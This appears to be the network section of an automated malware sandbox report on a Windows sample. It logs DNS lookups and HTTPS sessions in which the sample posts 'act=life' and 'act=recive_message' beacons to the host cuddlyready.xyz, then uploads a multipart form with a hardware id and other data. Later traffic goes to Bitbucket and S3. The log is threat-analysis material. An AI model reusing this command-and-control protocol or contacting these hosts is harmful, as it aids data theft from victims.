                                                                                                                                                          Dec 23, 2024 09:17:08.422208071 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.507416010 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.507450104 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.507488012 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.507514954 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.507529974 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.507582903 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.514478922 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.514498949 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.514578104 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.514595985 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.521567106 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.521615028 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.521648884 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.521662951 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.521703005 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.528603077 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.528650045 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.528690100 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.528702021 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.528714895 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.536138058 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.536170006 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.536201000 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.536212921 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.536243916 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.536268950 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.543153048 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.543169975 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.543211937 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.543220997 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.543252945 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.543272018 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.544044018 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.550250053 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.550266981 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.550309896 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.550318003 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.550354958 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.551095963 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.551150084 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.557286024 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.557303905 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.557365894 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.557377100 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.557415009 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.700793028 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.706532001 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.706554890 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.706607103 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.706625938 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.706649065 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.714282036 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.714327097 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.714349985 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.714363098 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.714421034 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.721317053 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.721360922 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.721383095 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.721395969 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.721437931 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.728429079 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.728471994 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.728503942 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.728516102 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.728543043 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.735112906 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.735151052 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.735183954 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.735197067 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.735229015 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.742963076 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.742996931 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.743047953 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.743050098 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.743062973 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.743093967 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.743122101 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.750005007 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.750025988 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.750075102 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.750087023 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.750134945 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.750139952 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.797235012 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.894968987 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.894995928 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.895036936 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.895054102 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.895080090 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.895097017 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.895778894 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.901949883 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.901966095 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.902029037 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.902040958 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.902066946 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.909889936 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.909946918 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.909950972 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.909971952 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.910006046 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.910023928 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.916950941 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.916975975 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.917023897 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.917032957 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.917064905 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.917081118 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:08.917084932 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.924015045 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.924043894 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:08.924077034 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.684694052 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.684726000 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.691730022 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.691771030 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.691803932 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.691807032 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.691814899 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.691843987 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.691900015 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.698462009 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.698491096 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.698580980 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.698587894 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.698862076 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.699301004 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706182003 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706204891 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706279993 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.706286907 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706432104 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.706501961 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.706613064 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.713649035 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.713670015 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.713701963 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.713789940 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.713789940 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.713798046 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.765969038 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.858493090 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.858525038 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.858607054 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.858622074 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.858622074 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.858644009 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.858669043 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.865578890 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.865608931 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.865655899 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.865664005 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.865967989 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.872530937 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.872605085 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.872651100 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.872662067 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.872687101 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.874253035 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.874331951 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:09.874357939 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.874418020 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:09.946759939 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:10.897244930 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:10.897278070 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:10.897291899 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:10.897298098 CET443497763.5.29.90192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 09:16:39.856121063 CET | 61983 | 53 | 192.168.2.6 | 1.1.1.1
Dec 23, 2024 09:16:40.261629105 CET | 53 | 61983 | 1.1.1.1 | 192.168.2.6
Dec 23, 2024 09:17:02.921773911 CET | 49956 | 53 | 192.168.2.6 | 1.1.1.1
Dec 23, 2024 09:17:03.058681965 CET | 53 | 49956 | 1.1.1.1 | 192.168.2.6
Dec 23, 2024 09:17:05.349839926 CET | 52561 | 53 | 192.168.2.6 | 1.1.1.1
Dec 23, 2024 09:17:05.640197992 CET | 53 | 52561 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 09:16:39.856121063 CET | 192.168.2.6 | 1.1.1.1 | 0xcdca | Standard query (0) | cuddlyready.xyz | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:02.921773911 CET | 192.168.2.6 | 1.1.1.1 | 0xed00 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:05.349839926 CET | 192.168.2.6 | 1.1.1.1 | 0x2483 | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 09:16:34.251465082 CET | 1.1.1.1 | 192.168.2.6 | 0xfd87 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 09:16:34.251465082 CET | 1.1.1.1 | 192.168.2.6 | 0xfd87 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:16:40.261629105 CET | 1.1.1.1 | 192.168.2.6 | 0xcdca | No error (0) | cuddlyready.xyz | | 172.67.150.173 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:16:40.261629105 CET | 1.1.1.1 | 192.168.2.6 | 0xcdca | No error (0) | cuddlyready.xyz | | 104.21.32.96 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:03.058681965 CET | 1.1.1.1 | 192.168.2.6 | 0xed00 | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:03.058681965 CET | 1.1.1.1 | 192.168.2.6 | 0xed00 | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:03.058681965 CET | 1.1.1.1 | 192.168.2.6 | 0xed00 | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.29.90 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.34.185 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.66.137 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.62.169 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.41.153 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.205.179 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.165.161 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:17:05.640197992 CET | 1.1.1.1 | 192.168.2.6 | 0x2483 | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.19 | A (IP address) | IN (0x0001) | false
• cuddlyready.xyz
• bitbucket.org
• bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49721 | 172.67.150.173 | 443 | 4140 | C:\Users\user\Desktop\BJQizQ6sqT.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:16:41 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cuddlyready.xyz
2024-12-23 08:16:41 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 08:16:42 UTC | 1123 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 08:16:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=q8og87vi4tr40mg8lagh6u5rds; expires=Fri, 18 Apr 2025 02:03:21 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qUumnh1fLezq8p6F6mnpukMYfj2pFYgeNyMG2bKveGZYrozkhTUaQ0trb9f2wUtj3nJPmOpioIedTMrDRQ9tUBSEQ%2B8uQ8HTzsZ%2FYDt6JRJ6VDslsR%2B5dhdg4IAv8GpJkdw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66e9359e0c7cea-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1816&rtt_var=691&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1607929&cwnd=226&unsent_bytes=0&cid=8196a2cb8fd3e578&ts=863&x=0"
2024-12-23 08:16:42 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 08:16:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.649722172.67.150.1734434140C:\Users\user\Desktop\BJQizQ6sqT.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-23 08:16:43 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 53
                                                                                                                                                          Host: cuddlyready.xyz
                                                                                                                                                          2024-12-23 08:16:43 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 08:16:44 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:44 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=47msghe9mctbpndlo2u03m2rfv; expires=Fri, 18 Apr 2025 02:03:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M72q7FPAgQXFJunoG8R5C8TBKNXXFP2cu3VoXBJAttf7oN3ZeLmi3lAcJQk6dFODJ4kAJ%2Fd3b%2BQea7LlZAr8rlwUislLO1%2FHqwk3T%2FYiUt7Kq6sntkeIKdcEm2tQFl6pkBg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9421ff50f4a-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1936339&cwnd=168&unsent_bytes=0&cid=d657c0e6db6074c7&ts=772&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49727 | 172.67.150.173 | 443 | 4140 | C:\Users\user\Desktop\BJQizQ6sqT.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:16:46 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: multipart/form-data; boundary=3Y5WVLYMON
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                          Content-Length: 12817
                                                                                                                                                          Host: cuddlyready.xyz
2024-12-23 08:16:46 UTC | 12817 | OUT | Data Ascii: --3Y5WVLYMONContent-Disposition: form-data; name="hwid"A179BE43D8540CACAC8923850305D13E--3Y5WVLYMONContent-Disposition: form-data; name="pid"2--3Y5WVLYMONContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--3Y5WVLYMONCo
2024-12-23 08:16:47 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Mon, 23 Dec 2024 08:16:47 GMT
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: PHPSESSID=q55j6pgm20ahsoj4ri2u0gddne; expires=Fri, 18 Apr 2025 02:03:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                          vary: accept-encoding
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbM%2BuhSCkVSq%2BYlDvLlQ9vH0v%2FtWPZ%2BpT%2Fx668TGClYlaJnKieE1kpxZ4V54eIbg7uP6Y2BQR%2BVdzPG2xKO0aV8u16Lm5%2Fwz3CDc4epFw4DEQLeRgg9dxWfRaaee6LArSZY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8f66e9541ed84233-EWR
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1755&rtt_var=668&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13748&delivery_rate=1624930&cwnd=219&unsent_bytes=0&cid=b9d53e98b5ebc918&ts=1067&x=0"
